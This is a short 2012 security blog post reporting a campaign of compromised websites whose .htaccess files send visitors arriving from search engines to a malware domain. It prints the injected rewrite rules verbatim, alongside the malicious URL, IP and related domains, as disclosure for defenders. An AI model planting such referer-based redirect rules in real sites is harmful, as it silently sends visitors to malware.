The Latest in IT Security

Malware Redirecting To Enormousw1illa.com

03
Feb
2012

We are seeing a large number of sites compromised with a conditional redirection to the domain http://enormousw1illa.com/ (194.28.114.102).

On all the sites we analyzed, the .htaccess file was modified so that if anyone visited the site from Google, Bing, Yahoo, or any major search engine (by checking the referer), it would get redirected to that malicious domain (http://enormousw1illa.com/nl-in.php?nnn=556).

This is what gets added to the .htaccess file of the hacked sites:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://enormousw1illa.com/nl-in.php?nnn=556 [R,L]

Google is already blacklisting it and so far it found that it was used to compromise 787 domains (but the number is probably bigger, since that domain just went live 3 days ago – Jan 29):

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 787 domain(s), including mieszkanielondyn.com/, thecentsiblelife.com/, red66.com/.

What is very interesting is that this malware is hosted at the same IP address as other domains that were used in .htaccess attacks in the past, so we think it is all done by the same group:

enormousw1illa.com
infoitpoweringgathering.com
sweepstakesandcontestsdo.com
sweepstakesandcontestsnow.com
.. few more domains ..

We will be monitoring how it is growing and we will post more details soon.

Leave a reply


Categories

FRIDAY, MARCH 29, 2024
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments